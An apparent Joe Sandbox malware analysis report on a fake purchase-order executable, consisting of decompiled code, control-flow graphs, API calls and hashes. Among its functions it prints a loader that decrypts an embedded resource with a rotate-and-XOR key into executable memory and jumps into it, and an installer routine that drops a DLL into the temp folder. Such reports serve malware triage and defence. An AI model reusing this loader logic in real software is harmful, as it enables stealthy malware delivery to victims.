                                            • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                            • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 65%
                                            			E100010B0() {
                                            				signed int _v5;
                                            				signed char _v6;
                                            				void* _v12;
                                            				void* _v16;
                                            				intOrPtr _v20;
                                            				long _v24;
                                            				signed int _v28;
                                            				intOrPtr _v32;
                                            				_Unknown_base(*)()* _v36;
                                            				_Unknown_base(*)()* _v40;
                                            				intOrPtr _v44;
                                            				_Unknown_base(*)()* _v48;
                                            				_Unknown_base(*)()* _v52;
                                            				intOrPtr _v56;
                                            				WCHAR* _v60;
                                            				_Unknown_base(*)()* _v64;
                                            				void* _t70;
                                            
                                            				_v12 = 0;
                                            				_v28 = 0;
                                            				_v60 = "iowrqocqoefza";
                                            				_v64 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "GetModuleHandleExW");
                                            				_v36 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "FindResourceW");
                                            				_v40 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "LoadResource");
                                            				_v48 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "LockResource");
                                            				_v52 = GetProcAddress(GetModuleHandleW(L"Kernel32.dll"), "SizeofResource");
                                            				_v20 = E10001000();
                                            				_v32 = _v36(_v20, 1, 0xa);
                                            				_v44 = _v40(_v20, _v32);
                                            				_v56 = _v48(_v44);
                                            				_v24 = _v52(_v20, _v32);
                                            				_t70 = VirtualAlloc(0, _v24, 0x1000, 0x40); // executed
                                            				_v16 = _t70;
                                            				E10001040(_v16, _v56, _v24);
                                            				_v12 = 0;
                                            				while(_v12 < _v24) {
                                            					_v5 =  *((intOrPtr*)(_v16 + _v12));
                                            					_v6 =  *((intOrPtr*)(_v60 + _v28));
                                            					 *((char*)(_v16 + _v12)) = ((_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005) ^ _v6 & 0x000000ff;
                                            					asm("cdq");
                                            					_v28 = (_v28 + 1) % 0xd;
                                            					_v12 = _v12 + 1;
                                            				}
                                            				goto __eax;
                                            			}




















                                            0x100010b6
                                            0x100010bd
                                            0x100010c4
                                            0x100010e2
                                            0x100010fc
                                            0x10001116
                                            0x10001130
                                            0x1000114a
                                            0x10001152
                                            0x10001160
                                            0x1000116e
                                            0x10001178
                                            0x10001186
                                            0x10001196
                                            0x1000119c
                                            0x100011ab
                                            0x100011b0
                                            0x100011c2
                                            0x100011d2
                                            0x100011dd
                                            0x100011fc
                                            0x10001204
                                            0x1000120c
                                            0x100011bf
                                            0x100011bf
                                            0x10001214

                                            APIs
                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetModuleHandleExW), ref: 100010D5
                                            • GetProcAddress.KERNEL32(00000000), ref: 100010DC
                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,FindResourceW), ref: 100010EF
                                            • GetProcAddress.KERNEL32(00000000), ref: 100010F6
                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,LoadResource), ref: 10001109
                                            • GetProcAddress.KERNEL32(00000000), ref: 10001110
                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,LockResource), ref: 10001123
                                            • GetProcAddress.KERNEL32(00000000), ref: 1000112A
                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,SizeofResource), ref: 1000113D
                                            • GetProcAddress.KERNEL32(00000000), ref: 10001144
                                              • Part of subcall function 10001000: GetModuleHandleW.KERNEL32(Kernel32.dll,GetModuleHandleExW), ref: 10001017
                                              • Part of subcall function 10001000: GetProcAddress.KERNEL32(00000000), ref: 1000101E
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 10001196
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc$AllocVirtual
                                            • String ID: FindResourceW$GetModuleHandleExW$Kernel32.dll$Kernel32.dll$Kernel32.dll$Kernel32.dll$Kernel32.dll$LoadResource$LockResource$SizeofResource
                                            • API String ID: 4195448317-78656208
                                            • Opcode ID: 69403377347bbd4cdb434f607d950d9fa058b09a5ee6e180100960d444137025
                                            • Instruction ID: 6da75c6d9eaa9837a3e736521a0478219455c01626f3678f946e2346b0ecdfb3
                                            • Opcode Fuzzy Hash: 69403377347bbd4cdb434f607d950d9fa058b09a5ee6e180100960d444137025
                                            • Instruction Fuzzy Hash: DA41E0B4D04218AFEF14DFE4C888AEEBBB5FF48381F108459F651B3248C7349A448B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 230 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 233 403120-403125 230->233 234 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 230->234 235 40336a-40336e 233->235 242 403243-403251 call 40302e 234->242 243 40315e 234->243 249 403322-403327 242->249 250 403257-40325a 242->250 245 403163-40317a 243->245 247 40317c 245->247 248 40317e-403187 call 4035e2 245->248 247->248 257 40318d-403194 248->257 258 4032de-4032e6 call 40302e 248->258 249->235 252 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 250->252 253 40325c-403274 call 4035f8 call 4035e2 250->253 279 4032d4-4032d9 252->279 280 4032e8-403318 call 4035f8 call 403371 252->280 253->249 282 40327a-403280 253->282 259 403210-403214 257->259 260 403196-4031aa call 406113 257->260 258->249 267 403216-40321d call 40302e 259->267 268 40321e-403224 259->268 260->268 277 4031ac-4031b3 260->277 267->268 270 403233-40323b 268->270 271 403226-403230 call 406b22 268->271 270->245 278 403241 270->278 271->270 277->268 284 4031b5-4031bc 277->284 278->242 279->235 291 40331d-403320 280->291 282->249 282->252 284->268 286 4031be-4031c5 284->286 286->268 288 4031c7-4031ce 286->288 288->268 290 4031d0-4031f0 288->290 290->249 292 4031f6-4031fa 290->292 291->249 293 403329-40333a 291->293 296 403202-40320a 292->296 297 4031fc-403200 292->297 294 403342-403347 293->294 295 40333c 293->295 298 403348-40334e 294->298 295->294 296->268 299 40320c-40320e 296->299 297->278 297->296 298->298 300 403350-403368 call 406113 298->300 299->268 300->235
                                            C-Code - Quality: 98%
                                            			E004030D0(void* __eflags, signed int _a4) {
                                            				DWORD* _v8;
                                            				DWORD* _v12;
                                            				intOrPtr _v16;
                                            				long _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				signed int _v40;
                                            				short _v560;
                                            				long _t54;
                                            				void* _t57;
                                            				void* _t62;
                                            				intOrPtr _t65;
                                            				void* _t68;
                                            				intOrPtr* _t70;
                                            				long _t82;
                                            				signed int _t89;
                                            				intOrPtr _t92;
                                            				long _t94;
                                            				void* _t102;
                                            				void* _t106;
                                            				long _t107;
                                            				long _t110;
                                            				void* _t111;
                                            
                                            				_t94 = 0;
                                            				_v8 = 0;
                                            				_v12 = 0;
                                            				 *0x42a26c = GetTickCount() + 0x3e8;
                                            				GetModuleFileNameW(0, L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe", 0x400);
                                            				_t106 = E00406158(L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe", 0x80000000, 3);
                                            				 *0x40a018 = _t106;
                                            				if(_t106 == 0xffffffff) {
                                            					return L"Error launching installer";
                                            				}
                                            				E00406668(L"C:\\Users\\Alvin\\Desktop", L"C:\\Users\\Alvin\\Desktop\\PO-230821_pdf.exe");
                                            				E00406668(0x439000, E00405F83(L"C:\\Users\\Alvin\\Desktop"));
                                            				_t54 = GetFileSize(_t106, 0);
                                            				 *0x420f00 = _t54;
                                            				_t110 = _t54;
                                            				if(_t54 <= 0) {
                                            					L24:
                                            					E0040302E(1);
                                            					if( *0x42a274 == _t94) {
                                            						goto L32;
                                            					}
                                            					if(_v12 == _t94) {
                                            						L28:
                                            						_t57 = GlobalAlloc(0x40, _v20); // executed
                                            						_t111 = _t57;
                                            						E00406B90(0x40ce68);
                                            						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Alvin\\AppData\\Local\\Temp\\"); // executed
                                            						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                            						 *0x40a01c = _t62;
                                            						if(_t62 != 0xffffffff) {
                                            							_t65 = E004035F8( *0x42a274 + 0x1c);
                                            							 *0x420f04 = _t65;
                                            							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                            							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                            							if(_t68 == _v20) {
                                            								 *0x42a270 = _t111;
                                            								 *0x42a278 =  *_t111;
                                            								if((_v40 & 0x00000001) != 0) {
                                            									 *0x42a27c =  *0x42a27c + 1;
                                            								}
                                            								_t45 = _t111 + 0x44; // 0x44
                                            								_t70 = _t45;
                                            								_t102 = 8;
                                            								do {
                                            									_t70 = _t70 - 8;
                                            									 *_t70 =  *_t70 + _t111;
                                            									_t102 = _t102 - 1;
                                            								} while (_t102 != 0);
                                            								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                            								E00406113(0x42a280, _t111 + 4, 0x40);
                                            								return 0;
                                            							}
                                            							goto L32;
                                            						}
                                            						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                            					}
                                            					E004035F8( *0x420ef0);
                                            					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                            						goto L32;
                                            					} else {
                                            						goto L28;
                                            					}
                                            				} else {
                                            					do {
                                            						_t107 = _t110;
                                            						asm("sbb eax, eax");
                                            						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                            						if(_t110 >= _t82) {
                                            							_t107 = _t82;
                                            						}
                                            						if(E004035E2(0x418ef0, _t107) == 0) {
                                            							E0040302E(1);
                                            							L32:
                                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                            						}
                                            						if( *0x42a274 != 0) {
                                            							if((_a4 & 0x00000002) == 0) {
                                            								E0040302E(0);
                                            							}
                                            							goto L20;
                                            						}
                                            						E00406113( &_v40, 0x418ef0, 0x1c);
                                            						_t89 = _v40;
                                            						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                            							_a4 = _a4 | _t89;
                                            							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                            							_t92 = _v16;
                                            							 *0x42a274 =  *0x420ef0;
                                            							if(_t92 > _t110) {
                                            								goto L32;
                                            							}
                                            							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                            								_v12 = _v12 + 1;
                                            								_t110 = _t92 - 4;
                                            								if(_t107 > _t110) {
                                            									_t107 = _t110;
                                            								}
                                            								goto L20;
                                            							} else {
                                            								break;
                                            							}
                                            						}
                                            						L20:
                                            						if(_t110 <  *0x420f00) {
                                            							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                            						}
                                            						 *0x420ef0 =  *0x420ef0 + _t107;
                                            						_t110 = _t110 - _t107;
                                            					} while (_t110 != 0);
                                            					_t94 = 0;
                                            					goto L24;
                                            				}
                                            			}




























                                            0x004030db
                                            0x004030de
                                            0x004030e1
                                            0x004030fb
                                            0x00403100
                                            0x00403113
                                            0x00403118
                                            0x0040311e
                                            0x00000000
                                            0x00403120
                                            0x00403131
                                            0x00403142
                                            0x00403149
                                            0x00403151
                                            0x00403156
                                            0x00403158
                                            0x00403243
                                            0x00403245
                                            0x00403251
                                            0x00000000
                                            0x00000000
                                            0x0040325a
                                            0x00403286
                                            0x0040328b
                                            0x00403296
                                            0x00403298
                                            0x004032a9
                                            0x004032c4
                                            0x004032cd
                                            0x004032d2
                                            0x004032f1
                                            0x00403301
                                            0x00403313
                                            0x00403318
                                            0x00403320
                                            0x0040332d
                                            0x00403335
                                            0x0040333a
                                            0x0040333c
                                            0x0040333c
                                            0x00403344
                                            0x00403344
                                            0x00403347
                                            0x00403348
                                            0x00403348
                                            0x0040334b
                                            0x0040334d
                                            0x0040334d
                                            0x00403357
                                            0x00403363
                                            0x00000000
                                            0x00403368
                                            0x00000000
                                            0x00403320
                                            0x00000000
                                            0x004032d4
                                            0x00403262
                                            0x00403274
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040315e
                                            0x00403163
                                            0x00403168
                                            0x0040316c
                                            0x00403173
                                            0x0040317a
                                            0x0040317c
                                            0x0040317c
                                            0x00403187
                                            0x004032e0
                                            0x00403322
                                            0x00000000
                                            0x00403322
                                            0x00403194
                                            0x00403214
                                            0x00403218
                                            0x0040321d
                                            0x00000000
                                            0x00403214
                                            0x0040319d
                                            0x004031a2
                                            0x004031aa
                                            0x004031d0
                                            0x004031df
                                            0x004031e5
                                            0x004031ea
                                            0x004031f0
                                            0x00000000
                                            0x00000000
                                            0x004031fa
                                            0x00403202
                                            0x00403205
                                            0x0040320a
                                            0x0040320c
                                            0x0040320c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004031fa
                                            0x0040321e
                                            0x00403224
                                            0x00403230
                                            0x00403230
                                            0x00403233
                                            0x00403239
                                            0x00403239
                                            0x00403241
                                            0x00000000
                                            0x00403241

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 004030E4
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO-230821_pdf.exe,00000400), ref: 00403100
                                              • Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 0040615C
                                              • Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-230821_pdf.exe,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 00403149
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040328B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO-230821_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                            • API String ID: 2803837635-598113387
                                            • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                            • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                            • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                            • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 367 40176f-401794 call 402da6 call 405fae 372 401796-40179c call 406668 367->372 373 40179e-4017b0 call 406668 call 405f37 lstrcatW 367->373 378 4017b5-4017b6 call 4068ef 372->378 373->378 382 4017bb-4017bf 378->382 383 4017c1-4017cb call 40699e 382->383 384 4017f2-4017f5 382->384 391 4017dd-4017ef 383->391 392 4017cd-4017db CompareFileTime 383->392 386 4017f7-4017f8 call 406133 384->386 387 4017fd-401819 call 406158 384->387 386->387 394 40181b-40181e 387->394 395 40188d-4018b6 call 4056ca call 403371 387->395 391->384 392->391 397 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 394->397 398 40186f-401879 call 4056ca 394->398 408 4018b8-4018bc 395->408 409 4018be-4018ca SetFileTime 395->409 397->382 431 401864-401865 397->431 410 401882-401888 398->410 408->409 413 4018d0-4018db FindCloseChangeNotification 408->413 409->413 411 402c33 410->411 415 402c35-402c39 411->415 416 4018e1-4018e4 413->416 417 402c2a-402c2d 413->417 419 4018e6-4018f7 call 4066a5 lstrcatW 416->419 420 4018f9-4018fc call 4066a5 416->420 417->411 426 401901-402398 419->426 420->426 429 40239d-4023a2 426->429 430 402398 call 405cc8 426->430 429->415 430->429 431->410 432 401867-401868 431->432 432->398
                                            C-Code - Quality: 77%
                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                                            				void* __esi;
                                            				void* _t35;
                                            				void* _t43;
                                            				void* _t45;
                                            				FILETIME* _t51;
                                            				FILETIME* _t64;
                                            				void* _t66;
                                            				signed int _t72;
                                            				FILETIME* _t73;
                                            				FILETIME* _t77;
                                            				signed int _t79;
                                            				WCHAR* _t81;
                                            				void* _t83;
                                            				void* _t84;
                                            				void* _t86;
                                            
                                            				_t77 = __ebx;
                                            				 *(_t86 - 8) = E00402DA6(0x31);
                                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                            				_t35 = E00405FAE( *(_t86 - 8));
                                            				_push( *(_t86 - 8));
                                            				_t81 = L"Fosk";
                                            				if(_t35 == 0) {
                                            					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Alvin\\AppData\\Local\\Temp")), ??);
                                            				} else {
                                            					E00406668();
                                            				}
                                            				E004068EF(_t81);
                                            				while(1) {
                                            					__eflags =  *(_t86 + 8) - 3;
                                            					if( *(_t86 + 8) >= 3) {
                                            						_t66 = E0040699E(_t81);
                                            						_t79 = 0;
                                            						__eflags = _t66 - _t77;
                                            						if(_t66 != _t77) {
                                            							_t73 = _t66 + 0x14;
                                            							__eflags = _t73;
                                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                            						}
                                            						asm("sbb eax, eax");
                                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                            						__eflags = _t72;
                                            						 *(_t86 + 8) = _t72;
                                            					}
                                            					__eflags =  *(_t86 + 8) - _t77;
                                            					if( *(_t86 + 8) == _t77) {
                                            						E00406133(_t81);
                                            					}
                                            					__eflags =  *(_t86 + 8) - 1;
                                            					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                            					__eflags = _t43 - 0xffffffff;
                                            					 *(_t86 - 0x38) = _t43;
                                            					if(_t43 != 0xffffffff) {
                                            						break;
                                            					}
                                            					__eflags =  *(_t86 + 8) - _t77;
                                            					if( *(_t86 + 8) != _t77) {
                                            						E004056CA(0xffffffe2,  *(_t86 - 8));
                                            						__eflags =  *(_t86 + 8) - 2;
                                            						if(__eflags == 0) {
                                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                                            						}
                                            						L31:
                                            						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                            						__eflags =  *0x42a2e8;
                                            						goto L32;
                                            					} else {
                                            						E00406668("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp", _t83);
                                            						E00406668(_t83, _t81);
                                            						E004066A5(_t77, _t81, _t83, "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                            						E00406668(_t83, "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp");
                                            						_t64 = E00405CC8("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll",  *(_t86 - 0x30) >> 3) - 4;
                                            						__eflags = _t64;
                                            						if(_t64 == 0) {
                                            							continue;
                                            						} else {
                                            							__eflags = _t64 == 1;
                                            							if(_t64 == 1) {
                                            								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                            								L32:
                                            								_t51 = 0;
                                            								__eflags = 0;
                                            							} else {
                                            								_push(_t81);
                                            								_push(0xfffffffa);
                                            								E004056CA();
                                            								L29:
                                            								_t51 = 0x7fffffff;
                                            							}
                                            						}
                                            					}
                                            					L33:
                                            					return _t51;
                                            				}
                                            				E004056CA(0xffffffea,  *(_t86 - 8));
                                            				 *0x42a314 =  *0x42a314 + 1;
                                            				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                            				 *0x42a314 =  *0x42a314 - 1;
                                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                            				_t84 = _t45;
                                            				if( *(_t86 - 0x24) != 0xffffffff) {
                                            					L22:
                                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                            				} else {
                                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                            						goto L22;
                                            					}
                                            				}
                                            				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                            				__eflags = _t84 - _t77;
                                            				if(_t84 >= _t77) {
                                            					goto L31;
                                            				} else {
                                            					__eflags = _t84 - 0xfffffffe;
                                            					if(_t84 != 0xfffffffe) {
                                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                            					} else {
                                            						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                            						lstrcatW(_t81,  *(_t86 - 8));
                                            					}
                                            					_push(0x200010);
                                            					_push(_t81);
                                            					E00405CC8();
                                            					goto L29;
                                            				}
                                            				goto L33;
                                            			}


















                                            0x0040176f
                                            0x00401776
                                            0x00401782
                                            0x00401785
                                            0x0040178a
                                            0x0040178d
                                            0x00401794
                                            0x004017b0
                                            0x00401796
                                            0x00401797
                                            0x00401797
                                            0x004017b6
                                            0x004017bb
                                            0x004017bb
                                            0x004017bf
                                            0x004017c2
                                            0x004017c7
                                            0x004017c9
                                            0x004017cb
                                            0x004017d0
                                            0x004017d0
                                            0x004017db
                                            0x004017db
                                            0x004017ec
                                            0x004017ee
                                            0x004017ee
                                            0x004017ef
                                            0x004017ef
                                            0x004017f2
                                            0x004017f5
                                            0x004017f8
                                            0x004017f8
                                            0x004017ff
                                            0x0040180e
                                            0x00401813
                                            0x00401816
                                            0x00401819
                                            0x00000000
                                            0x00000000
                                            0x0040181b
                                            0x0040181e
                                            0x00401874
                                            0x00401879
                                            0x004015b6
                                            0x0040292e
                                            0x0040292e
                                            0x00402c2a
                                            0x00402c2d
                                            0x00402c2d
                                            0x00000000
                                            0x00401820
                                            0x00401826
                                            0x0040182d
                                            0x0040183a
                                            0x00401845
                                            0x0040185b
                                            0x0040185b
                                            0x0040185e
                                            0x00000000
                                            0x00401864
                                            0x00401864
                                            0x00401865
                                            0x00401882
                                            0x00402c33
                                            0x00402c33
                                            0x00402c33
                                            0x00401867
                                            0x00401867
                                            0x00401868
                                            0x00401493
                                            0x0040239d
                                            0x0040239d
                                            0x0040239d
                                            0x00401865
                                            0x0040185e
                                            0x00402c35
                                            0x00402c39
                                            0x00402c39
                                            0x00401892
                                            0x00401897
                                            0x004018a5
                                            0x004018aa
                                            0x004018b0
                                            0x004018b4
                                            0x004018b6
                                            0x004018be
                                            0x004018ca
                                            0x004018b8
                                            0x004018b8
                                            0x004018bc
                                            0x00000000
                                            0x00000000
                                            0x004018bc
                                            0x004018d3
                                            0x004018d9
                                            0x004018db
                                            0x00000000
                                            0x004018e1
                                            0x004018e1
                                            0x004018e4
                                            0x004018fc
                                            0x004018e6
                                            0x004018e9
                                            0x004018f2
                                            0x004018f2
                                            0x00401901
                                            0x00401906
                                            0x00402398
                                            0x00000000
                                            0x00402398
                                            0x00000000

                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                            • CompareFileTime.KERNEL32(-00000014,?,Fosklcks,Fosklcks,00000000,00000000,Fosklcks,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll$Fosklcks
                                            • API String ID: 1941528284-1804423583
                                            • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                            • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                            • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                            • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 433 2450dc0-2450e90 call 245005f call 2450073 * 7 call 2450109 CreateFileW 452 2450e96-2450ea1 433->452 453 2450f6f 433->453 452->453 458 2450ea7-2450eb7 VirtualAlloc 452->458 454 2450f71-2450f76 453->454 456 2450f7c-2450f81 454->456 457 2450f78 454->457 462 2450f9d-2450fa0 456->462 457->456 458->453 459 2450ebd-2450ecc ReadFile 458->459 459->453 461 2450ed2-2450ef1 VirtualAlloc 459->461 465 2450ef3-2450f06 call 24500da 461->465 466 2450f6b-2450f6d 461->466 463 2450f83-2450f87 462->463 464 2450fa2-2450fa7 462->464 470 2450f93-2450f95 463->470 471 2450f89-2450f91 463->471 467 2450fb4-2450fbc 464->467 468 2450fa9-2450fb1 VirtualFree 464->468 475 2450f41-2450f51 call 2450073 465->475 476 2450f08-2450f13 465->476 466->454 468->467 472 2450f97-2450f9a 470->472 473 2450f9c 470->473 471->462 472->462 473->462 475->454 481 2450f53-2450f58 475->481 478 2450f16-2450f3f call 24500da 476->478 478->475 483 2450f5e-2450f69 VirtualFree 481->483 484 2450f5a-2450f5b FindCloseChangeNotification 481->484 483->462 484->483
                                            APIs
